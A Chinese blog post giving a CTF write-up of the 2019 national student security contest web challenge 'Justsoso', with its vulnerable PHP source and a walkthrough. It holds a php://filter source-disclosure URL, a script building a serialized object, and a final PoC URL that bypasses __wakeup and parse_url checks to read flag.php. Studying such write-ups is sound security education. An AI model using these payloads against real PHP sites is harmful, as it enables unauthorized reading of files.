<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
<title>2019全国大学生信息安全竞赛反序列化题目复现 - Threezh1&#39;s blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="Share learn & Share life.">



<meta name="keywords" content="Threezh1">



    <meta name="description" content="Web - Justsoso&amp;#x4F7F;&amp;#x7528;php&amp;#x4F2A;&amp;#x534F;&amp;#x8BAE;&amp;#x8BFB;&amp;#x5230;hint&amp;#x548C;index&amp;#x7684;&amp;#x6E90;&amp;#x7801;&amp;#xFF1A; /index.php?file=php://filter/read=convert.base64-encode/resource=hint.php  in">
<meta name="keywords" content="CTF,Writeup,PHP,反序列化">
<meta property="og:type" content="article">
<meta property="og:title" content="2019全国大学生信息安全竞赛反序列化题目复现">
<meta property="og:url" content="http://yoursite.com/2019/04/27/2019全国大学生信息安全竞赛WEB1_Writeuo/index.html">
<meta property="og:site_name" content="Threezh1&#39;s blog">
<meta property="og:description" content="Web - Justsoso&amp;#x4F7F;&amp;#x7528;php&amp;#x4F2A;&amp;#x534F;&amp;#x8BAE;&amp;#x8BFB;&amp;#x5230;hint&amp;#x548C;index&amp;#x7684;&amp;#x6E90;&amp;#x7801;&amp;#xFF1A; /index.php?file=php://filter/read=convert.base64-encode/resource=hint.php  in">
<meta property="og:locale" content="Chinese">
<meta property="og:image" content="https://i.loli.net/2019/04/27/5cc4058f84a22.jpg">
<meta property="og:updated_time" content="2020-02-12T13:52:04.456Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019全国大学生信息安全竞赛反序列化题目复现">
<meta name="twitter:description" content="Web - Justsoso&amp;#x4F7F;&amp;#x7528;php&amp;#x4F2A;&amp;#x534F;&amp;#x8BAE;&amp;#x8BFB;&amp;#x5230;hint&amp;#x548C;index&amp;#x7684;&amp;#x6E90;&amp;#x7801;&amp;#xFF1A; /index.php?file=php://filter/read=convert.base64-encode/resource=hint.php  in">
<meta name="twitter:image" content="https://i.loli.net/2019/04/27/5cc4058f84a22.jpg">





<link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">

<link rel="stylesheet" href="/css/style.css">

<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    


</head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item " href="/archives">归档</a>
            
            <a class="navbar-item " href="/Projects">项目</a>
            
            <a class="navbar-item " href="/Life">生活</a>
            
            <a class="navbar-item " href="/Photography">摄影</a>
            
            <a class="navbar-item " href="/about">关于</a>
            
            <a class="navbar-item " href="http://121.36.32.184/">Threeday</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Chercher" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            <div class="navbar-item is-hoverable has-dropdown is-hidden-mobile is-hidden-tablet-only toc">
                <a class="navbar-item" title="Table des Matières">
                    <i class="fa fa-list"></i>
                </a>
                <div class="navbar-dropdown is-right">
                    
                    
                    
                    
                    <a class="navbar-item" href="#Web-Justsoso">1&nbsp;&nbsp;<b>Web - Justsoso</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#题目参考">2&nbsp;&nbsp;<b>题目参考</b></a>
                    
                </div>
            </div>
            
            
            <a class="navbar-item" title="GitHub" href="https://github.com/Threezh1">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            2019全国大学生信息安全竞赛反序列化题目复现
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            <time datetime="2019-04-27T04:00:00.000Z" itemprop="datePublished">Apr 27 2019</time>
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/技术文章/">技术文章</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            6 minutes lire (À propos 846 mots)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <h2 id="Web-Justsoso"><a href="#Web-Justsoso" class="headerlink" title="Web - Justsoso"></a>Web - Justsoso</h2><p>&#x4F7F;&#x7528;php&#x4F2A;&#x534F;&#x8BAE;&#x8BFB;&#x5230;hint&#x548C;index&#x7684;&#x6E90;&#x7801;&#xFF1A;</p>
<p><code>/index.php?file=php://filter/read=convert.base64-encode/resource=hint.php</code></p>
<ul>
<li>index.php:</li>
</ul>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="hljs-number">0</span>);</span><br><span class="line">$file = $_GET[<span class="hljs-string">&quot;file&quot;</span>];</span><br><span class="line">$payload = $_GET[<span class="hljs-string">&quot;payload&quot;</span>];</span><br><span class="line"> </span><br><span class="line"><span class="hljs-keyword">if</span> (!<span class="hljs-keyword">isset</span>($file)) {</span><br><span class="line">    <span class="hljs-keyword">echo</span> <span class="hljs-string">&apos;Missing parameter&apos;</span> . <span class="hljs-string">&apos;&lt;br&gt;&apos;</span>;</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">&quot;/flag/&quot;</span>, $file)) {</span><br><span class="line">    <span class="hljs-keyword">die</span>(<span class="hljs-string">&apos;hack attacked!!!&apos;</span>);</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line">@<span class="hljs-keyword">include</span> ($file);</span><br><span class="line"><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($payload)) {</span><br><span class="line">    $url = parse_url($_SERVER[<span class="hljs-string">&apos;REQUEST_URI&apos;</span>]);</span><br><span class="line">    parse_str($url[<span class="hljs-string">&apos;query&apos;</span>], $query);</span><br><span class="line">    <span class="hljs-keyword">foreach</span> ($query <span class="hljs-keyword">as</span> $value) {</span><br><span class="line">        <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">&quot;/flag/&quot;</span>, $value)) {</span><br><span class="line">            <span class="hljs-keyword">die</span>(<span class="hljs-string">&apos;stop hacking!&apos;</span>);</span><br><span class="line">            <span class="hljs-keyword">exit</span>();</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">    $payload = unserialize($payload);</span><br><span class="line">} <span class="hljs-keyword">else</span> {</span><br><span class="line">    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Missing parameters&quot;</span>;</span><br><span class="line">}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<a id="more"></a>
<ul>
<li>hint.php</li>
</ul>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Handle</span> </span>{</span><br><span class="line">    <span class="hljs-keyword">private</span> $handle;</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span><span class="hljs-params">()</span> </span>{</span><br><span class="line">        <span class="hljs-keyword">foreach</span> (get_object_vars(<span class="hljs-keyword">$this</span>) <span class="hljs-keyword">as</span> $k =&gt; $v) {</span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;$k = <span class="hljs-keyword">null</span>;</span><br><span class="line">        }</span><br><span class="line">        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Waking upn&quot;</span>;</span><br><span class="line">    }</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($handle)</span> </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;handle = $handle;</span><br><span class="line">    }</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span> </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;handle-&gt;getFlag();</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Flag</span> </span>{</span><br><span class="line">    <span class="hljs-keyword">public</span> $file;</span><br><span class="line">    <span class="hljs-keyword">public</span> $token;</span><br><span class="line">    <span class="hljs-keyword">public</span> $token_flag;</span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($file)</span> </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;file = $file;</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;token_flag = <span class="hljs-keyword">$this</span>-&gt;token = md5(rand(<span class="hljs-number">1</span>, <span class="hljs-number">10000</span>));</span><br><span class="line">    }</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getFlag</span><span class="hljs-params">()</span> </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;token_flag = md5(rand(<span class="hljs-number">1</span>, <span class="hljs-number">10000</span>));</span><br><span class="line">        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;token === <span class="hljs-keyword">$this</span>-&gt;token_flag) {</span><br><span class="line">            <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-keyword">$this</span>-&gt;file)) {</span><br><span class="line">                <span class="hljs-keyword">echo</span> @highlight_file(<span class="hljs-keyword">$this</span>-&gt;file, <span class="hljs-keyword">true</span>);</span><br><span class="line">            }</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>&#x5206;&#x6790;index.php (&#x53C2;&#x6570;file, payload&#x90FD;&#x88AB;&#x5B9A;&#x4E49;)</li>
</ul>
<ol>
<li>file&#x53C2;&#x6570;&#x4E2D;&#x8BFB;&#x5230;<code>flag</code>&#x5C31;&#x62E6;&#x622A;</li>
<li>&#x4F7F;&#x7528;parse_url&#x89E3;&#x6790;&#x5F53;&#x524D;URL&#x7684;&#x8DEF;&#x5F84;</li>
<li>&#x7EE7;&#x7EED;&#x5339;&#x914D;<code>flag</code>&#x5E76;&#x62E6;&#x622A;</li>
<li>&#x5168;&#x90E8;&#x901A;&#x8FC7;&#x4E86;&#x4E4B;&#x540E;&#x53CD;&#x5E8F;&#x5217;&#x5316;payload&#x53C2;&#x6570;&#x7684;&#x503C;</li>
</ol>
<ul>
<li>&#x5206;&#x6790;hint.php</li>
</ul>
<p>class Handle&#xFF1A;</p>
<ol>
<li><code>__wakeup()</code> &#x5C06;&#x6240;&#x6709;&#x53D8;&#x91CF;&#x90FD;&#x8D4B;&#x503C;&#x4E3A;&#x7A7A;</li>
<li><code>__construct($handle)</code> &#x5C06;$handle&#x7684;&#x503C;&#x8D4B;&#x503C;&#x7ED9;$this-&gt;handle</li>
<li><code>__destruct()</code> &#x8C03;&#x7528;getFlag();</li>
</ol>
<p>class Flag&#xFF1A;</p>
<ol>
<li><code>__construct($file)</code> &#x5C06;$file&#x8D4B;&#x503C;&#x7ED9;$this-&gt;file&#xFF0C;token_flag&#xFF0C;token&#x90FD;&#x8D4B;&#x503C;&#x4E3A;1-10000&#x540C;&#x4E00;&#x4E2A;&#x968F;&#x673A;&#x6570;&#x5B57;&#x7684;md5&#x503C;&#x3002;</li>
<li><code>getFlag()</code> token_flah&#x88AB;&#x8D4B;&#x503C;&#x4E3A;&#x4E00;&#x4E2A;&#x65B0;&#x7684;&#x968F;&#x673A;&#x6570;md5&#x503C;&#xFF0C;&#x5224;&#x65AD;token&#x548C;token_flag&#x662F;&#x5426;&#x4E00;&#x81F4;&#xFF0C;&#x5982;&#x679C;&#x4E00;&#x81F4;&#xFF0C;&#x518D;&#x5224;&#x65AD;$this-&gt;file&#x662F;&#x5426;&#x88AB;&#x5B9A;&#x4E49;&#xFF0C;&#x5982;&#x679C;&#x5B9A;&#x4E49;&#xFF0C;&#x518D;&#x8BFB;&#x53D6;&#x6587;&#x4EF6;&#x3002;&#x5373;&#x53EF;&#x4EE5;&#x8BFB;&#x53D6;flag&#x3002;</li>
</ol>
<ul>
<li>&#x76EE;&#x7684;&#xFF1A;</li>
</ul>
<p>&#x901A;&#x8FC7;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6784;&#x9020;&#x4E00;&#x4E2A;poc&#xFF0C;&#x5B9A;&#x4E49;$file&#xFF0C;&#x8BFB;&#x53D6;&#x5230;flag&#x3002;</p>
<p>&#x8FD9;&#x91CC;&#x6709;&#x51E0;&#x5904;&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x5730;&#x65B9;&#xFF1A;</p>
<ol>
<li>&#x9700;&#x8981;&#x7ED5;&#x8FC7;parse_url&#x4F7F;<code>flag</code>&#x5B57;&#x7B26;&#x80FD;&#x591F;&#x88AB;&#x4F20;&#x9012;&#x8FDB;&#x6765;&#x3002;</li>
<li><code>__wakeup()</code>&#x6E05;&#x7A7A;&#x4E86;&#x6240;&#x6709;&#x53D8;&#x91CF;&#xFF0C;&#x9700;&#x8981;&#x7ED5;&#x8FC7;&#x3002;</li>
<li>&#x5982;&#x4F55;&#x4F7F;token&#x548C;token_flag&#x7684;&#x503C;&#x5728;getFlag()&#x5904;&#x76F8;&#x7B49;</li>
</ol>
<ul>
<li>&#x6784;&#x9020;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#xFF1A;</li>
</ul>
<p>&#x8FD9;&#x91CC;&#x6211;&#x76F4;&#x63A5;&#x590D;&#x5236;&#x4E86;&#x53C2;&#x8003;&#x6587;&#x7AE0;&#x91CC;&#x9762;&#x7684;&#x6784;&#x9020;&#x6E90;&#x7801;&#x3002;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Handle</span></span>{       </span><br><span class="line">    <span class="hljs-keyword">private</span> $handle;        </span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span><span class="hljs-params">()</span></span>{</span><br><span class="line">            <span class="hljs-keyword">foreach</span>(get_object_vars(<span class="hljs-keyword">$this</span>) <span class="hljs-keyword">as</span> $k =&gt; $v) {</span><br><span class="line">                <span class="hljs-keyword">$this</span>-&gt;$k = <span class="hljs-keyword">null</span>;         </span><br><span class="line">            }          </span><br><span class="line">            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Waking upn&quot;</span>;      </span><br><span class="line">    }</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($handle)</span> </span>{           </span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;handle = $handle;       </span><br><span class="line">    }    </span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span></span>{    </span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;handle-&gt;getFlag();   </span><br><span class="line">    }  </span><br><span class="line">}    </span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Flag</span></span>{      </span><br><span class="line">    <span class="hljs-keyword">public</span> $file;      </span><br><span class="line">    <span class="hljs-keyword">public</span> $token;      </span><br><span class="line">    <span class="hljs-keyword">public</span> $token_flag;         </span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($file)</span></span>{    </span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;file = $file;    </span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;token_flag = <span class="hljs-keyword">$this</span>-&gt;token = md5(rand(<span class="hljs-number">1</span>,<span class="hljs-number">10000</span>));      </span><br><span class="line">    }         </span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getFlag</span><span class="hljs-params">()</span></span>{       </span><br><span class="line">        <span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-keyword">$this</span>-&gt;file)){      </span><br><span class="line">            <span class="hljs-keyword">echo</span> @highlight_file(<span class="hljs-keyword">$this</span>-&gt;file,<span class="hljs-keyword">true</span>);               </span><br><span class="line">        }            </span><br><span class="line">    }  </span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$b = <span class="hljs-keyword">new</span> Flag(<span class="hljs-string">&quot;flag.php&quot;</span>);  <span class="hljs-comment">//&#x5148;&#x521B;&#x5EFA;Flag&#x5BF9;&#x8C61;</span></span><br><span class="line">$b-&gt;token=&amp;$b-&gt;token_flag;	<span class="hljs-comment">//&#x5C06;token&#x4F5C;&#x4E3A;token_flag&#x7684;&#x5F15;&#x7528;</span></span><br><span class="line">$a = <span class="hljs-keyword">new</span> Handle($b);	<span class="hljs-comment">//&#x521B;&#x5EFA;Handle&#x5BF9;&#x8C61;,&#x5C06;Flag&#x5BF9;&#x8C61;&#x4F5C;&#x4E3A;&#x53C2;&#x6570;&#x4F20;&#x9012;&#x8FDB;&#x53BB;&#xFF0C;&#x8FDB;&#x800C;&#x53EF;&#x4EE5;&#x8C03;&#x7528;getFlag()&#x65B9;&#x6CD5;&#x3002;</span></span><br><span class="line"><span class="hljs-keyword">echo</span>(serialize($a)); <span class="hljs-comment">//&#x6700;&#x540E;&#x5E8F;&#x5217;&#x5316;</span></span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x6839;&#x636E;&#x6587;&#x4E2D;&#x7684;&#x65B9;&#x6CD5;&#xFF0C;&#x4E09;&#x4E2A;&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x70B9;&#x7684;&#x7ED5;&#x8FC7;&#x65B9;&#x6CD5;&#x4E3A;&#xFF1A;</p>
<ol>
<li>&#x5229;&#x7528;parse_url&#x89E3;&#x6790;&#x6F0F;&#x6D1E;&#xFF0C;&#x5728;&#x57DF;&#x540D;&#x540E;&#x9762;&#x7684;&#x4E00;&#x4E2A;/&#x6539;&#x4E3A;///&#x5373;&#x53EF;&#x7ED5;&#x8FC7;</li>
<li>&#x5F53;&#x6210;&#x5458;&#x5C5E;&#x6027;&#x6570;&#x76EE;&#x5927;&#x4E8E;&#x5B9E;&#x9645;&#x6570;&#x76EE;&#x65F6;&#x53EF;&#x7ED5;&#x8FC7;wakeup&#x65B9;&#x6CD5;&#xFF0C;&#x4E5F;&#x5C31;&#x662F;&#x5C06;poc&#x91CC;&#x7684;&#xFF1A;<code>O:6:&quot;Handle&quot;:1:{s:...</code> &#x6539;&#x4E3A; <code>O:6:&quot;Handle&quot;:2:{s:...</code> &#x5373;&#x53EF;&#x3002;</li>
<li>&#x4F7F;&#x7528;php&#x7684;&#x5F15;&#x7528;&#x8D4B;&#x503C;&#xFF0C;&#x5C06;token&#x4F5C;&#x4E3A;token_flag&#x7684;&#x5F15;&#x7528;&#xFF0C;&#x5F53;token_flag&#x91CD;&#x65B0;&#x88AB;&#x8D4B;&#x503C;&#x65F6;&#xFF0C;token&#x4E5F;&#x4F1A;&#x6539;&#x53D8;&#x3002;</li>
</ol>
<p>&#x6700;&#x540E;&#x7684;poc&#x4E3A;&#xFF1A;</p>
<p><code>http://127.0.0.1///index.php?file=hint.php&amp;payload=O:6:%22Handle%22:2:{s:14:%22%00Handle%00handle%22;O:4:%22Flag%22:3:{s:4:%22file%22;s:8:%22flag.php%22;s:5:%22token%22;N;s:10:%22token_flag%22;R:4;}}</code></p>
<p>&#x7531;&#x4E8E;&#x9898;&#x76EE;&#x73AF;&#x5883;&#x5DF2;&#x7ECF;&#x4E0D;&#x5728;&#x4E86;&#xFF0C;&#x672C;&#x5730;&#x642D;&#x5EFA;&#x4E86;&#x4E00;&#x4E0B;,parse_url&#x89E3;&#x6790;&#x6F0F;&#x6D1E;&#x590D;&#x73B0;&#x4E0D;&#x51FA;&#x6765;&#xFF0C;&#x4E8E;&#x662F;&#x53EA;&#x80FD;&#x8DF3;&#x8FC7;&#x90A3;&#x4E2A;&#x590D;&#x73B0;&#x4E00;&#x4E0B;&#xFF0C;&#x5982;&#x56FE;&#x3002;</p>
<p><img src="https://i.loli.net/2019/04/27/5cc4058f84a22.jpg" alt="pic"></p>
<h2 id="&#x9898;&#x76EE;&#x53C2;&#x8003;"><a href="#&#x9898;&#x76EE;&#x53C2;&#x8003;" class="headerlink" title="&#x9898;&#x76EE;&#x53C2;&#x8003;"></a>&#x9898;&#x76EE;&#x53C2;&#x8003;</h2><ul>
<li><a href="https://www.anquanke.com/post/id/177039" target="_blank" rel="noopener">https://www.anquanke.com/post/id/177039</a></li>
<li><a href="http://www.cnblogs.com/kagari/p/10758155.html" target="_blank" rel="noopener">http://www.cnblogs.com/kagari/p/10758155.html</a></li>
</ul>

    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/CTF/">#CTF</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/Writeup/">#Writeup</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/PHP/">#PHP</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/反序列化/">#反序列化</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2019/05/15/川师线下CTF-Web-Writeup/">川师线下CTF Writeup</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2019/04/19/DDCTF 部分Writeup/">DDCTF 部分题目 Writeup</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2020 Threezh1&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" href="https://github.com/Threezh1">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("chinese");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.js" integrity="sha384-K3vbOmF2BtaVai+Qk37uypf7VrgBubhQreNQe9aGsz9lB63dIFiQVlJbr92dw2Lx" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/contrib/auto-render.min.js" integrity="sha384-kmZOZB5ObwgQnS/DuDg6TScgOiWWBiVt0plIRkZCmE6rDZGrEOQeHM5PcHi+nyqe" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>

<script>
document.addEventListener("DOMContentLoaded", function() {
    renderMathInElement(document.body, {
        // ...options...
    });
});
</script>

    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
